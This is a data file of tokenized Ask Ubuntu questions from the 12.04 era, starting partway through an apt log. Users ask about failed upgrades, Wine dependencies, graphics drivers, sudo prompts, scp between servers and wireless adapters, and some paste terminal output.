4:0.8.3ubuntu0.12.04.1 ubuntu:12.04/precise-updates [ amd64 ] ) inst libopenjpeg2 ( 1.3+dfsg-4 ubuntu:12.04/precise [ amd64 ] ) remv libavcodec53 [ 4:0.8.3-0ubuntu0.12.04.1 ] [ gstreamer0.10-ffmpeg : amd64 libavformat53 : amd64 ] inst libavcodec-extra-53 ( 4:0.8.3ubuntu0.12.04.1 ubuntu:12.04/precise-updates [ amd64 ] ) conf libopenjpeg2 ( 1.3+dfsg-4 ubuntu:12.04/precise [ amd64 ] ) conf libavcodec-extra-53 ( 4:0.8.3ubuntu0.12.04.1 ubuntu:12.04/precise-updates [ amd64 ] ) inst cabextract ( 1.4-1 ubuntu:12.04/precise [ amd64 ] ) inst ttf-mscorefonts-installer ( 3.4ubuntu3 ubuntu:12.04/precise [ all ] ) inst libfaac0 ( 1.28-0ubuntu2 ubuntu:12.04/precise [ amd64 ] ) inst libquicktime2 ( 2:1.2.3-4build2 ubuntu:12.04/precise [ amd64 ] ) inst libmjpegtools-1.9 ( 1:1.9.0-0.5ubuntu7 ubuntu:12.04/precise [ amd64 ] ) inst gstreamer0.10-plugins-bad-multiverse ( 0.10.21-1 ubuntu:12.04/precise [ amd64 ] ) inst ubuntu-restricted-extras ( 57 ubuntu:12.04/precise [ amd64 ] ) inst unrar ( 1:4.0.3-1 ubuntu:12.04/precise [ amd64 ] ) conf cabextract ( 1.4-1 ubuntu:12.04/precise [ amd64 ] ) conf ttf-mscorefonts-installer ( 3.4ubuntu3 ubuntu:12.04/precise [ all ] ) conf libfaac0 ( 1.28-0ubuntu2 ubuntu:12.04/precise [ amd64 ] ) conf libquicktime2 ( 2:1.2.3-4build2 ubuntu:12.04/precise [ amd64 ] ) conf libmjpegtools-1.9 ( 1:1.9.0-0.5ubuntu7 ubuntu:12.04/precise [ amd64 ] ) conf gstreamer0.10-plugins-bad-multiverse ( 0.10.21-1 ubuntu:12.04/precise [ amd64 ] ) conf ubuntu-restricted-extras ( 57 ubuntu:12.04/precise [ amd64 ] ) conf unrar ( 1:4.0.3-1 ubuntu:12.04/precise [ amd64 ] )
153885	upgrade from 11.10 to 12.04 failed ; installing the upgrades ; preparing libco	screenshot of distribution upgrade failure i had ubuntu 11.10 installed in a virtual machine . attempted to upgrade it to 12.04 and it hung at installing the upgrades/preparing libco . left it there all day . still able to navigate around it , but ultimately at the end of the day it still did not finish upgrading . attempted to reboot it and in return it just flickered during boot up . system state frozen , preparing libco stuck , installing upgrades , 12.04 reinstalling from scratch .
153887	wubi installation does n't complete	i have a problem with the wubi installation on windows . i open the installation , put the info , click `` install '' and wait . but at some point , the program closes , without giving me any error or `` reboot '' message . i reboot my pc anyways , and find out that ubuntu is not installed . i tried the 2.38mb wubi installation and the one that comes with the cd . both are 12.04 lts . both give the same result . i am running windows 7 professional 64-bit with an intel core 2 duo cpu and 4gb ram . how can i install successfully with wubi ?
153893	samba and user acount passwords	is it possible to tie your login password to your samba password ? ideally every 30 days , users need to change their passwords to login into the machine and if its possible , when they update their password , it 'll also update the samba password .
153894	launch an application in windows from the ubuntu desktop	i 'd like a write a shell script in ubuntu that does the following : boot up a windows 7 guest os in virtualbox , if it is n't running already . run a shell script in windows , where the shell script is invoked from the ubuntu host operating system . my goal is to create an application launcher on the ubuntu host desktop for an application on the guest os . for example , i could create a shortcut for visual studio on the ubuntu desktop that launches visual studio in windows . i 've always wanted to be able to launch windows applications directly from the ubuntu desktop instead of waiting for windows to start up before clicking an application shortcut .
153895	replacing the login screen	i removed the login screen from ubuntu because it was the wrong one ... but instead of reverting back to the default screen , it just goes blank after the boot ! what do i do now ? i 'm almost certain i can fix the problem with synaptic , but i ca n't get to it !
153898	no sound with headphones but sound with stereo	i have a dell studio 1749 . i just installed 12.04 on a dual boot with windows 7 ( the stereo sound and headphones work perfectly when booted into windows , sound turned up before booting into ubuntu ) . the stereo sound seems to be working fine . the headphones , not so much . my computer has two headphone jacks . when i put my working headphones into the first jack , the stereo sound is muted but there is no sound in the headphones . when i put my headphones into the second jack , the stereo sound is still there and no sound comes out of the headphones . two different problems ? i first tried the sound troubleshooting found in the comunity support wiki . there seemed to be no problems . however , i 'm not positive that my sound cards were on the list . it was a little convoluted for my noob self . i 've tried the commands listed here : but there were no changes . i 've also brought up the alsamixer . the headphones do n't appear to be muted or anything . i do n't know how to switch to the second sound card and check that one , though . any help would be greatly appreciated !
153899	ca n't click after login on ubuntu 12.04	since i upgraded to 12.04 in april , i have had mouse issues . when i first log in , my mouse works fine ( i.e . i can click and launch an application , or click-and-drag on the desktop ) . after i launch an application , for the most part i can no longer click on anything . sometimes i can click the title bar at the top ( time , sound , etc . in the task bar ) . my keyboard still seems to work . i can alt+tab , or alt+ctrl+delete , or tab through widgets . this happens for me on every single log in . to fix the problem , i have to alt+ctrl+del , then log out , then log back in . after that , my mouse works fine . is there anything like xprop or xwininfo that can tell me what has stolen my mouse ? evtest still shows the mouse events - the desktop simply does n't respond . does anyone have any solutions for this ? it seems similar to this bug : https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/41301 , but it 's not `` sporadic '' .
153900	how can i start a process with a different name ?	basically i want to dynamically start some processes which may create their own children processes , also i want to kill a certain group of processes i just created whenever i want . one way i could think of is to start processes with a name ( to distinguish as a group ) , then use pkill to kill them by the name . the question is how to start a process with a name so that i can use pkill to kill them by the name ? i am open to other solutions as well .
153906	why did unity stop working after i upgraded to the 3.4.3 mainline kernel ?	i installed the latest linux kernel ( 3.4.3 ) . after rebooting , it says i am in ubuntu 2d . how do i either go back to my previous kernel , or fix this problem ? thanks . $ uname -r 3.4.3-030403-generic
153907	dependency problems installing wine 1.5 on ubuntu 12.04 x64	trying user1261084 solution : $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . trying @ eric-carvalho solution once more $ apt-cache policy libgnutls26 libgnutls26 : installed : 2.12.19-1 candidate : 2.12.19-1 version table : *** 2.12.19-1 0 100 /var/lib/dpkg/status 2.12.14-5ubuntu3.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 2.12.14-5ubuntu3 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages i was removed ppa : ubuntu-wine/ppa repository ( software center > edit > software sources > other software and manually remove ) then went to ubuntu software tab and changed download from to main server as user1261084 suggested . after that i tried to downgrade libgnutls26 to version 2.12.14-5ubuntu3.1 : $ sudo apt-get install libgnutls26=2.12.14-5ubuntu3.1 reading package lists ... done building dependency tree reading state information ... done suggested packages : gnutls-bin the following packages will be downgraded : libgnutls26 0 upgraded , 0 newly installed , 1 downgraded , 0 to remove and 8 not upgraded . need to get 459 kb of archives . after this operation , 326 kb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main libgnutls26 amd64 2.12.14-5ubuntu3.1 [ 459 kb ] fetched 459 kb in 5s ( 86.8 kb/s ) dpkg : warning : downgrading libgnutls26 from 2.12.19-1 to 2.12.14-5ubuntu3.1 . ( reading database ... 267654 files and directories currently installed . ) preparing to replace libgnutls26 2.12.19-1 ( using ... /libgnutls26_2.12.14-5ubuntu3.1_amd64.deb ) ... unpacking replacement libgnutls26 ... setting up libgnutls26 ( 2.12.14-5ubuntu3.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place it worked so : $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : autopoint rpm librpmbuild2 librpmsign0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : fonts-droid fonts-horai-umefont libasn1-8-heimdal : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libcapi20-3 libcapi20-3 : i386 libcups2 : i386 libexif12 : i386 libgcrypt11 : i386 libgd2-xpm : i386 libgif4 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglu1-mesa : i386 libgnutls26 : i386 libgpg-error0 : i386 libgphoto2-2 : i386 libgphoto2-port0 : i386 libgssapi-krb5-2 : i386 libgssapi3-heimdal : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libhcrypto4-heimdal : i386 libheimbase1-heimdal : i386 libheimntlm0-heimdal : i386 libhx509-5-heimdal : i386 libieee1284-3 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-26-heimdal : i386 libkrb5-3 : i386 libkrb5support0 : i386 libldap-2.4-2 : i386 libllvm3.0 : i386 libltdl7 : i386 libmpg123-0 : i386 libopenal1 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libroken18-heimdal : i386 libsane : i386 libsasl2-2 : i386 libsasl2-modules : i386 libssl1.0.0 : i386 libtasn1-3 : i386 libusb-0.1-4 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libwind0-heimdal : i386 libx11-xcb1 : i386 libxcb-glx0 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxfixes3 : i386 libxinerama1 : i386 libxml2 : i386 libxpm4 : i386 libxrandr2 : i386 libxslt1.1 : i386 libxxf86vm1 : i386 ttf-droid ttf-umefont wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 winetricks suggested packages : cups-common : i386 rng-tools : i386 libgd-tools : i386 libglide3 : i386 gnutls-bin : i386 gphoto2 : i386 gtkam : i386 krb5-doc : i386 krb5-user : i386 libvisual-0.4-plugins : i386 gstreamer-codec-install : i386 gnome-codec-install : i386 gstreamer0.10-tools : i386 gstreamer0.10-plugins-base : i386 hpoj : i386 hplip : i386 libsane-extras : i386 sane-utils : i386 libsasl2-modules-otp : i386 libsasl2-modules-ldap : i386 libsasl2-modules-sql : i386 libsasl2-modules-gssapi-mit : i386 libsasl2-modules-gssapi-heimdal : i386 dosbox recommended packages : xml-core : i386 gettext : i386 the following packages will be removed : alien debhelper gettext gnome-common intltool intltool-debian po-debconf the following new packages will be installed : fonts-droid fonts-horai-umefont libasn1-8-heimdal : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libcapi20-3 libcapi20-3 : i386 libcups2 : i386 libexif12 : i386 libgcrypt11 : i386 libgd2-xpm : i386 libgif4 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglu1-mesa : i386 libgnutls26 : i386 libgpg-error0 : i386 libgphoto2-2 : i386 libgphoto2-port0 : i386 libgssapi-krb5-2 : i386 libgssapi3-heimdal : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libhcrypto4-heimdal : i386 libheimbase1-heimdal : i386 libheimntlm0-heimdal : i386 libhx509-5-heimdal : i386 libieee1284-3 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-26-heimdal : i386 libkrb5-3 : i386 libkrb5support0 : i386 libldap-2.4-2 : i386 libllvm3.0 : i386 libltdl7 : i386 libmpg123-0 : i386 libopenal1 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libroken18-heimdal : i386 libsane : i386 libsasl2-2 : i386 libsasl2-modules : i386 libssl1.0.0 : i386 libtasn1-3 : i386 libusb-0.1-4 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libwind0-heimdal : i386 libx11-xcb1 : i386 libxcb-glx0 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxfixes3 : i386 libxinerama1 : i386 libxml2 : i386 libxpm4 : i386 libxrandr2 : i386 libxslt1.1 : i386 libxxf86vm1 : i386 ttf-droid ttf-umefont wine wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 winetricks 0 upgraded , 74 newly installed , 7 to remove and 8 not upgraded . need to get 143 mb of archives . after this operation , 408 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ... setting up wine1.4-common ( 1.4-0ubuntu4.1 ) ... setting up wine1.4-amd64 ( 1.4-0ubuntu4.1 ) ... setting up wine1.4-i386 : i386 ( 1.4-0ubuntu4.1 ) ... setting up wine1.4 ( 1.4-0ubuntu4.1 ) ... setting up wine ( 1.4-0ubuntu4.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place checking wine version ( installed : 1.4-0ubuntu4.1 ) $ apt-cache policy wine wine : installed : 1.4-0ubuntu4.1 candidate : 1.4-0ubuntu4.1 version table : *** 1.4-0ubuntu4.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/universe amd64 packages 100 /var/lib/dpkg/status 1.4-0ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe amd64 packages full log here now i have wine 1.4 installed i added ppa : ubuntu-wine/ppa repository again and : $ sudo apt-get install wine1.5 ( ... ) $ apt-cache policy wine wine : installed : 1.5.13-0ubuntu1 candidate : 1.5.13-0ubuntu1 version table : *** 1.5.13-0ubuntu1 0 500 http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 1.4-0ubuntu4.1 0 500 http : //mirror.globo.com/ubuntu/archive/ precise-updates/universe amd64 packages 1.4-0ubuntu4 0 500 http : //mirror.globo.com/ubuntu/archive/ precise/universe amd64 packages so finally i have wine 1.5 installed ( ^-^ ) thanks for eric carvalho and user1261084 help .
153911	why wo n't ubuntu single sign on allow me to register ?	every time i try to register , i fill out the form and it comes back to me as if i had not included a password . i am including passwords that very definitely meet the requirements listed . any ideas ?
153913	windows error after wubi install	the initial install on my laptop was windows 7 . i installed wubi on sunday - the install seemed fine . i was able to log in and use both ubuntu and windows . on monday i started receiving the following error in windows : windows can not access the specified device path or file this occurs on every link i click on - essentially rendering windows unusable . i do not experience the same problem when windows is started up in safe mode . i have tried numerous virus scans ( malware bytes , avg , adaware ) and have removed various trojans etc . windows is still unusable . ubuntu seems fine so far . my question is , can this error be attributed to the wubi install ?
153914	i updated my system just now.but the updating software says me that updates were installed 3days ago .	please recommend me what kind of updates are not needed .
153915	how to install drivers for nvidia geforce fx 5200 on precise	ok , i 'm a total linux noob . i was able to install 12.4 without issue , except that it says in the system settings that the graphics card/driver is `` unknown '' . i have nvidia geforce fx 5200 , and have not been able to get it installed . i 've found the driver at nvidia but could n't figure out how to actually install it . i found instructions that used apt-get to automatically find the current driver and install it , and that came close . at least then it showed up in the 3rd party drivers list . it said it was installed but not being used ? and i was unable to find out why that might be , or how to get the system to use it two questions : 1 . can/should my graphics card work with 12.4 ? 2 . if so , how ? i 'm running a 100 % fresh install , so what 's the step-by-step from there ?
153916	why does compiz crash on the ubuntu host when opening windows 7 in virtualbox ?	i opened a windows 7 virtual machine tonight from virtualbox , and compiz crashed , resulting in me thinking for about a minute that my laptop had frozen , but it came back with a compiz crash after it restarted and offered me to file a bug report . it was fine when it came back . apparently , i ca n't file a bug report because precise is out of beta . should i panic ?
153919	way to make shotwell use ffmpegthumbnailer instead of totem for thumbnails ?	totem never works right in my experience . my latest problem is that totem will not display some video thumbnails . i fixed the problem by installing ffmpegthumbnailer and using this to generate thumbnails . but unfortunately it appears to have only fixed the problem within nautilus . shotwell , it seems , is still relying on totem for its thumbnails because all the same videos that totem would n't show thumbnails for , shotwell still wo n't either -- even though nautilus is now showing thumbnails for them because of ffmpegthumbnailer . how do i get shotwell to use ffmpegthumbnailer instead of totem for video thumbnails ?
153927	windows 7/ 12.04 dual boot mess	i am new to ubuntu and to linux in general . i installed ubuntu 12.04 to a brand new desktop which had windows 7 pre-installed , and am dual-booting between them . both operating systems work well . then i tried to change the order of the boot menu to make ubuntu first and windows 7 second . i did this from the windows side ( it seems that my setup is relying on the windows boot loader , which i do n't think i need to change ) using the built-in startup manager ( i think that 's what windows calls it- it 's in the control panel ) . i set ubuntu as first ( default if no user input ) . then i accidentally ( `` hmmm ... i wonder what this button does ? '' ) set the menu timeout to 0 . now , i can not change the menu timeout ( because i can not get into windows ) and without doing so , i can not select windows as the os i would like to boot ( i can not get into windows ) . how can i fix this ?
153928	`` failure to download extra data files '' after installing ttf-mscorefonts-installer	after fresh install 12.04 i & & updating apt and system restart , i always get this annoying message after reboot : failure to download extra data files the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . ttf-mscorefonts-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . but if i run attempt now , it shows flashing terminal window and like nothing happen . it 'll happen again when i restart system . i found someone have this problem too , but he have n't replied yet . i 'm a newbie here , please help .
153930	how to permanently disable user switching in gnome 3 ?	i have six boys , and they tend to ask another parent when wanting to use one of the computers , but do n't bother asking the logged in user if they 're finished . all four machines are running ubuntu 12.04 with gnome 3 . how can i permanently disable user switching - not just in the user menu , but also on the lock screen ?
153931	weird error ( bug ? ) on my screen	i 've got a problem . here is my laptop spec : type : asus a43e-vx389d video card : intel hd graphic memory : 2 gb ddr3 processor : intel b950 ( 2.1 ghz , 2mb l3 cache ) i 'm using ubuntu precise pangolin 64-bit , with graphic card , detected as intel sandybridge mobile . now , i have the following error ( see images below ) : sometimes , it 's just partial . sometimes , i could get 'the error ' almost a whole screen . could somebody help me out ? fyi , if i maximized the window , the 'error ' is sometimes gone . and if it still there , i just minimized/maximized/restored the window till it 's gone . and it happens so frequently . to be honest , that 's very annoying .
153933	no password prompt at sudo command	whenever i issue command sudo apt-get install ** it does not ask for password , not in my admin user too . how to make it prompt for password ? my sudoer : ubuntu : ~ $ sudo cat /etc/sudoers # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d all all= ( all ) nopasswd : all
153936	unmet dependencies with linux-tools-common	when i try to install a ( random ) package i got the following error . the following packages have unmet dependencies : linux-tools-3.2.0-24 : depends : linux-tools-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried : apt-get -f install and i got the following error message : the following extra packages will be installed : linux-tools-common the following new packages will be installed : linux-tools-common 0 upgraded , 1 newly installed , 0 to remove and 36 not upgraded . 2 not fully installed or removed . need to get 0 b/69.3 kb of archives . after this operation , 183 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 183468 files and directories currently installed . ) unpacking linux-tools-common ( from ... /linux-tools-common_3.2.0-25.40_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-tools-common_3.2.0-25.40_all.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man1/perf.1.gz ' , which is also in package linux-base 3.4ubuntu2 processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/linux-tools-common_3.2.0-25.40_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what should i do next ? edit : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1008713 edit2 : i manage to remove the error rebooting ubuntu in the recovery mode and i ran dpkg repair broken package
153941	installing apc . use pecl or apt-get ?	i have seen guides that use apt-get install php-apc and guides that use pecl install apc . is one method better then the other ? or is just two different methods of installing the same thing ? what is the difference ? from what i read it seems that using pecl install will get a later version , is that right ? using ubuntu 12.04-64bit if it matters . thanks .
153944	screen brightness stuck on high on an hp dv7t laptop	i have an otherwise fully-functioning install of ubuntu 12.04 on my hpdv7t laptop . when i press the 'brightness buttons ' on the keyboard the associated images appear on my screen to say i am increasing/decreasing the screen brightness . when i go into `` system settings '' i can move the 'brightness slider bar ' up and down . but none of that changes the fact that my screen is stuck on the highest brightness setting . any clues on how to fix this would be greatly appreciated . this giant 17-inch monitor is blinding , and this is making it hard to code for any length of time .
153952	how do you backup your encrypted home folder ?	i installed ubuntu 12.04 and checkmarked to encrypt my home folder . how do i backup my home directory at a later time ?
153954	sudo user without the permission to edit sudoers	how can i add an user to sudoers list with all privileges , but that user should not be able to edit the sudoers file ?
153955	how do i get my trendnet 150mbps micro wireless n usb adapter to stay connected to the internet ?	how do i get my trendnet 150mbps micro wireless n usb adapter to stay connected ? it does n't actually drop from the connection list , the internet just stops working . purchased trendnet 150mbps micro wireless n usb adapter from tips on the forum however its not working well with ubuntu 12.10 . already tried disabling ipv6 . it works really well until it drops and will not connect again until i either restart or remove it & put it back in . i tried using the reinstall driver instructions here however the current driver is r8169-6.017.00 and i 'm not sure how to fix it . here is the attached information it should take to solve ? thanks for the help in advance ! timothy @ timothy-fx7020 : ~ $ lsusb bus 001 device 012 : id 20f4:648b trendnet tew-648ubm 802.11n 150mbps micro wireless n adapter [ realtek rtl8188cus ] bus 001 device 004 : id 046d:0990 logitech , inc. quickcam pro 9000 bus 001 device 007 : id 0a48:5014 i/o interconnect mass storage device bus 002 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 003 : id 03f0 : d407 hewlett-packard bus 002 device 004 : id 045e:0773 microsoft corp . bus 002 device 005 : id 147a : e018 formosa industrial computing , inc. ehome infrared receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 006 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 002 device 007 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) bus 002 device 008 : id 0461:4d75 primax electronics , ltd rocketfish rf-flbtad bluetooth adapter timothy @ timothy-fx7020 : ~ $ lspci 00:00.0 ram memory : nvidia corporation mcp61 memory controller ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:06.0 communication controller : conexant systems , inc. device 2f40 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati juniper [ radeon hd 5700 series ] 02:00.1 audio device : advanced micro devices [ amd ] nee ati juniper hdmi audio [ radeon hd 5700 series ] 04:00.0 multimedia video controller : conexant systems , inc. cx23887/8 pcie broadcast audio and video decoder with 3d comb ( rev 0f ) timothy @ timothy-fx7020 : ~ $ sudo iwconfig wlan0 power off error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; operation not supported . sudo apt-get wicd timothy @ timothy-fx7020 : ~ $ uname -r 3.4.0-5-generic sudo modprobe iwl3945 dmesg | grep iwl lspci -nn | grep -i wireless sudo su echo iwl3945 > > /etc/modules exit timothy @ timothy-fx7020 : /usr/src/r8169-6.017.00 $ lsmod module size used by iwl3945 65159 0 iwlegacy 104427 1 iwl3945 bnep 18140 2 rfcomm 42525 12 parport_pc 32688 0 dm_crypt 23011 1 ppdev 17073 0 snd_hda_codec_hdmi 32007 1 ir_lirc_codec 12859 0 lirc_dev 19166 1 ir_lirc_codec ir_mce_kbd_decoder 12723 0 ir_sanyo_decoder 12513 0 arc4 12529 2 ir_sony_decoder 12510 0 rtl8192cu 67616 0 ir_jvc_decoder 12507 0 rtl8192c_common 48850 1 rtl8192cu rtlwifi 74705 1 rtl8192cu binfmt_misc 17500 1 ir_rc6_decoder 12507 0 mac80211 511695 5 iwl3945 , iwlegacy , rtl8192cu , rtl8192c_common , rtlwifi ir_rc5_decoder 12507 0 snd_hda_codec_realtek 77546 1 ir_nec_decoder 12507 0 cfg80211 201922 4 iwl3945 , iwlegacy , rtlwifi , mac80211 uvcvideo 72299 0 rc_rc6_mce 12502 0 snd_usb_audio 121567 1 mceusb 17884 0 videobuf2_core 32851 1 uvcvideo snd_usbmidi_lib 24953 1 snd_usb_audio videobuf2_vmalloc 12860 1 uvcvideo videobuf2_memops 13368 1 videobuf2_vmalloc joydev 17457 0 cx23885 165896 0 rc_core 22359 12 ir_lirc_codec , ir_mce_kbd_decoder , ir_sanyo_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , rc_rc6_mce , mceusb , cx23885 videobuf_dma_sg 19305 1 cx23885 snd_hda_intel 33312 5 altera_stapl 34665 1 cx23885 snd_hda_codec 123834 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel cx2341x 28283 1 cx23885 tda18271 41725 1 cx23885 videobuf_dvb 14092 1 cx23885 videobuf_core 26022 3 cx23885 , videobuf_dma_sg , videobuf_dvb v4l2_common 16420 2 cx23885 , cx2341x videodev 107211 4 uvcvideo , cx23885 , cx2341x , v4l2_common altera_ci 19582 1 cx23885 microcode 22803 0 snd_hwdep 13602 2 snd_usb_audio , snd_hda_codec snd_pcm 96580 5 snd_hda_codec_hdmi , snd_usb_audio , cx23885 , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30512 2 snd_usbmidi_lib , snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi psmouse 86064 0 snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq edac_core 53305 0 btusb 18299 0 edac_mce_amd 23303 0 dvb_core 110113 3 cx23885 , videobuf_dvb , altera_ci btcx_risc 13640 1 cx23885 tveeprom 21249 1 cx23885 serio_raw 13211 0 snd 78734 25 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_usb_audio , snd_usbmidi_lib , cx23885 , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15047 1 snd snd_page_alloc 18484 2 snd_hda_intel , snd_pcm fglrx 3266157 172 k10temp 13119 0 bluetooth 209506 28 bnep , rfcomm , btusb mac_hid 13205 0 i2c_nforce2 13013 0 lp 17759 0 parport 46345 3 parport_pc , ppdev , lp vesafb 13797 1 usbhid 46962 0 hid 99792 1 usbhid uas 17890 0 usb_storage 48838 0 sata_nv 31830 3 forcedeth 67156 0 pata_amd 14118 0
153957	why does n't 12.04 recognize my ati radeon x300se graphics card ?	so far everything including the bcm4321 card is working , however , the oem ati radeon x300se ( rv370 ) is not recognized . when i go into system details the card comes up as unknown . when i run lspci the card shows up as : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv370 5b60 [ radeon x300 ( pcie ) ] 01:00.1 display controller : advanced micro devices [ amd ] nee ati rv370 [ radeon x300se ] i have attempted check additional drivers but the card does not show up as needing a driver . so far this is causing the system to run warmer as the processor is doing a bit of the work to run unity and any full screen videos tend to be rather choppy . is there an available driver that will fix my issue and what is the install method ? i am not scared to run a terminal so no worries there , as long as i have instructions , i can find my way . i am running under 12.04 lts kernel 3.2.0-25-generic-pae
153960	scp with two different ports	how can i use scp command to copy files between two remote servers from my local pc ? remote server 1 : ip=67.12.21.133 & port=6774 remote server 2 : ip=67.129.242.40 & port=6774 scp -rp -p 6774 denny @ 67.12.21.133 : /home/denny/testapp1.txt denny @ 67.129.242.40 : it gives an error after giving password of 67.12.21.133 , ssh : connect to host 67.129.242.40 port 22 : connection refused lost connection
153962	why is n't the printscreen button working in gnome ?	printscreen button not working on gnome . i have to run shutter to make printscreen . is there any tutorial to make it work with printscreen button ?
153963	desktop files and ubuntu software center	since 12.04 , when additional software is installed , ubuntu software center puts an icon in the launcher , representing a .desktop file in /usr/share/app-install/desktop/ . this desktop file is not `` overruled '' by a ( possible ) local .desktop file in ~.local/share/applications . my question is : why is the initial icon ( .desktop file ) put there , and is not the default .desktop file used that is located in /usr/share/applications ?
153964	how do i prevent standard users from using the usb ports ?	i 'm admin for one of my college pc with 3 other normal users . if possible i want to restrict other 3 normal users from using usb . i 'm using ubuntu 12.04 .
153965	how to reduce bubble-notification time in empathy ?	empathy shows a bubble notification message on top right corner if a user comes online or goes offline ( obviously we can change them from the preferences ) , but is there any way we can reduce the time for which the bubble notification remains on screen . by default it remains fro 3-4 seconds , is there any way we can change it to 1 or may be 2 seconds ( i know the matter is of few seconds only but 4 seconds looks too long and i want to reduce it ) . any help is welcome . cheers .
